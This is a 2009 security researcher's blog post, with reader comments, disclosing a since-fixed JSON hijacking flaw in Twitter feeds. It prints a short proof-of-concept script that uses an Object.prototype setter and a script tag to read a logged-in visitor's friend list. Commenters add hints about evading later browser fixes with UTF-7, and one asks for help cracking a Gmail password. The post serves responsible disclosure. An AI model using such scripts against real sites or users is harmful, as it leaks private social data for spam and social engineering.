I know what your friends did last summer
Wednesday, 7 January 2009
I did report this to Twitter a few weeks ago, but now that Chris Heilmann has let the cat out of the bag I’ll post my repro now. Basically Twitter JSON security is leaking data, the JSON feeds that are publically available shouldn’t be IMO or at least protected using known methods.
So if you use Twitter a web site can know who you are and who your friends are. Spammers could you this data to automate targeted spamming attacks or maybe automated social engineering, you’re more like to open a email attachment off your friends right?
The attack works by including the JSON data using a script tag on any web site, using setters you can get the data of the JSON feed in every browser except IE (in my testing).
<script>
Object.prototype.__defineSetter__('user',function(obj){for(var i in obj) {alert(i + '=' + obj[i]);} });
</script>
<script defer="defer" src=https://twitter.com/statuses/friends_timeline/>
</script>
Originally I thought it was a bug in Firefox, that’s why I’ve used Object.prototype and not simply Object but I found a post by Joe Walker which uses a far better technique to grab all the data.
Here is the proof of concept to prove I do know what your friends did last summer:-
twitter json hack
No. 1 — January 7th, 2009 at 5:23 pm
how about document.write() instead of alert() for your PoC? 🙂
No. 2 — January 7th, 2009 at 5:36 pm
LOL nah I like annoying people 🙂 plus I can’t be bothered changing it now
No. 3 — January 7th, 2009 at 5:38 pm
* Note You need to be logged into twitter using https in order for the POC to work correct
No. 4 — January 13th, 2009 at 9:19 am
Twitter has now fixed the problem whoo hoo
No. 5 — January 13th, 2009 at 10:34 am
Get NoScript 1.8.8.95 from http://noscript.net/getit#devel 🙂
http://hackademix.net/2009/01/13/you-dont-know-what-my-twitter-leaks/
http://hackademix.net/2009/01/13/twitter-json-hijacking-updates/
No. 6 — February 26th, 2009 at 9:29 am
Hi Gareth
I found your name and information on the Security Planet website. Can you help me, or do you know someone who can help me, to crack a gmail password?
Thanks
Pete
No. 7 — February 26th, 2009 at 9:52 am
@Pete
I think you misunderstood what I actually do. I’m a security researcher.
No. 8 — May 21st, 2009 at 4:23 pm
I had to have a chuckle at Petes comment! Cheered me right up!
No. 9 — December 21st, 2009 at 11:45 am
It seems that doesn’t work in ff 3.5 because setters are ignored when initializing object. Any ideas how to evade that?
No. 10 — December 21st, 2009 at 1:13 pm
@carstein
UTF-7 should work until they fix it
No. 11 — December 21st, 2009 at 1:42 pm
@Gareth:
I don’t think I follow you. UTF-7 where?
The problem is, that in FF3 you can define Setter for an Object.prototype which gets invoked when you recived JSON object (as a JS, so Object() is being initialized). However, due to tweaks in FF3.5 setters are only called when the value is begin set to an existing object, but not during initialization (so it spoils all the joy of JSON hijack).
No. 12 — December 22nd, 2009 at 10:44 am
@carstein
I do follow honest but if you used poisoned UTF-7 data with a json request then you can get most of the data by manipulating the javascript. See my CSP hack.
http://www.thespanner.co.uk/2009/11/23/bypassing-csp-for-fun-no-profit/